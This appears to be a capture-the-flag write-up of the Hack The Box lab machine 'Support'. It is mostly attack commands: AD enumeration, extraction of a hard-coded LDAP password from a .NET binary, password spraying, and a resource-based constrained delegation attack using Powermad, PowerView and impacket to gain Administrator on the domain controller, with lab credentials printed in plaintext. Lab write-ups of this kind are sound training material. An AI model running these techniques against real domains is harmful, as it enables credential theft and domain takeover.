🚨 R1nzler

Support

6 min read

Machine: https://app.hackthebox.com/machines/484

Enumeration

Enumeration service / versions

  • We can use nmap to enumerate de opened ports
nmap -p- -sS -n -Pn --min-rate 5000 10.10.11.174 -oG allPorts
  • As we can see, we have a windows machine (127 ttl and usuals windows services), now run a service version scan and use some common scripts
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49674,49676,49699,49737 -sVC -n -Pn --min-rate 5000 10.10.11.174 -vvv -oN Targeted

Domain name: support.htb, lets add this locations to /etc/hosts

DNS

  • Using dig, but i didnt get nothing especial, as well as using other utilities:
dig 10.10.11.174

LDAP

  • We can use ldapsearch and try to enumerate without credentials, but nothing interesting
ldapsearch -x -H ldap://10.10.11.174 -D '' -w '' -b "DC=support,DC=htb"

SMB

  • Using nmap we can enumetate the supported dialects, but there is not a lot of info
nmap -p445 -script "smb*" -T5 -n -sS -Pn 10.10.11.174
  • Using smbclient lets try to enumerate shares with a NULL session
smbclient -N -L //10.10.11.174
  • lets check the privilegues that we have on this shares using smbmap

If we want to use a null session in smbmap we need to write "none" in the "-u" field, This dont works -u ''

smbmap -H 10.10.11.174 -u none
  • Grate, now we can see the shares, and there are some interesting folders like “support-tools” lets take a look
smbclient -N //10.10.11.174/support-tools
ls
mget *
  • There are a lot of .exe we can try to run strings (-e l is useful to windows binaries l = 16bits), without -e l, maybe a user ‘0xdf’
strings UserInfo.exe | less
  • with -e l, maybe more users ‘armando, ldap’
strings -e l UserInfo.exe | less

Kerberos

  • Maybe we can try to test this users using kerbrute, first we can try a random username
kerbrute_linux_amd64 userenum -d support.htb --dc 10.10.11.174 /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt
  • now a wordlist with the found users
kerbrute_linux_amd64 userenum -d support.htb --dc 10.10.11.174 usernames
impacket-GetNPUsers support.htb/ldap -no-pass
or
impacket-GetNPUsers support.htb/ldap -no-pass -k
  • There are no user with this flag on “UF_DONT_REQUIRE_PREAUTH” so lets try brute forcing the pass with kerbrute but… nothing
kerbrute_linux_amd64 bruteuser -d support.htb --dc 10.10.11.174 /usr/share/wordlists/rockyou.txt usernames -t 200

Foothold

  • going back to the executables lets try to run it on a local environment
.\UserInfo.exe
  • looks like we can get info
  • if the program can read via ldap (as we saw using strings) maybe is performing authentication, and it is sending the credencials, so we can check it using wireshark (a protable executable is include with the machine), so as fast as we send the request we see the credentials
.\UserInfo.exe user -username raven.clifton
  • but nothing interesting here

Decompile

  • At this point we know that userinfo.exe make a ldap connection so the credentials are used in here, so lets try to decompile with dnSpy
  • perfect, so we have:
    • The enconded password: 0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E
    • The key: armando
    • And the process
public static string getPassword()
{
	byte[] array = Convert.FromBase64String(Protected.enc_password);
	byte[] array2 = array;
	for (int i = 0; i < array.Length; i++)
	{
		array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223);
	}
	return Encoding.Default.GetString(array2);
}
  • Here we hace the plan password, so we can inicialice the program on debug mode and set a breakpoint, when the function is used
  • So the credentials are ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
  • To be sure we can test the credentials
crackmapexec smb 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

winrm

  • we can try this credentials to authenticate us in winrm protocol (port 5985)
crackmapexec winrm 10.10.11.174 -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'

Request TGT / TGS

  • we can try to get a ticket but nothing
impacket-GetUserSPNs support.htb/ldap:'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -request

RPC (port 135)

  • As we have valid creeds we can try to get authenticated via rpc usgin rpcclient
rpcclient 10.10.11.174 -U 'support.htb/ldap%nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
  • we have access, so we can enumerate some things like: Users: enumdomusers:

Display all users information: querydispinfo:

Groups: enumdomgroups:

Get user members of ‘domain admins’ group: querygroupmem 0x200:

Get user from “RID”: queryuser 0x1f4:

  • We dont see nothing especial, so lets make a valid users list in order to preform a brute forcing attack
rpcclient 10.10.11.174 -U 'support.htb/ldap%nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -c 'enumdomusers' | grep -oP '\[.*?\]' | grep -vE '0x*' | tr -d '[]' > usernames

Password Spraying

  • we can try to reuse the found creadential in all users usin kerbrute (same result using crackmapexec)
kerbrute_linux_amd64 passwordspray usernames 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --dc 10.10.11.174 -d support.htb

Lateral Movement

Ldap (Using creds)

  • if we looking for information about the found users, we can see something interesting in the user ‘support’
ldapsearch -H ldap://10.10.11.174 -x -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -D 'ldap@support.htb' -b "DC=support,DC=htb" "*"
  • We test the password and perfect, is a valid password
crackmapexec smb 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
ldapdomaindump 10.10.11.174 -u 'support\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --authtype SIMPLE

or (and then import the result into BloodHound)

bloodhound-python -d support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -c ALL -ns 10.10.11.174 --dns-tcp
  • now we know that ‘support’ user is part of the group ‘remote management users’ so lets try to validate it
crackmapexec winrm 10.10.11.174 -u 'support' -p 'Ironside47pleasure40Watchful'
 evil-winrm --ip 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'

Privilege Escalation

  • If we check the BloodHound diagram we can see that we are part of the group ‘shared support accounts’ and if we check this group, we see that have full control over the DC0 (DC machine)

RBCD (resource based constrained delegation attack)

  • To perform this attack we are going to use rcbd.py (as well we can use Rubeus.exe like the example of hacktricks), more info here, first, we crate a computer object inside domaing using powermad, so upload powermad and PowerView to the victim machine
upload /home/jr117/Desktop/jr117/herramientas/Powermad
upload /home/jr117/Desktop/jr117/herramientas/PowerTools/PowerView
Import-Module ./Powermad/Powermad.ps1
Import-Module .\PowerView.ps1
  • now lets create the machine account (remember de name and the password)
New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
  • Configure the object
$ComputerSid = Get-DomainComputer SERVICEA -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#Check that it worked
Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity'
impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support.htb/SERVICEA:123456
  • We can use this .ccache to authenticate into the dc using impacket-psexec

We need to set this environment variable 

export KRB5CCNAME=Administrator.ccache
impacket-psexec -k dc.support.htb

Graph View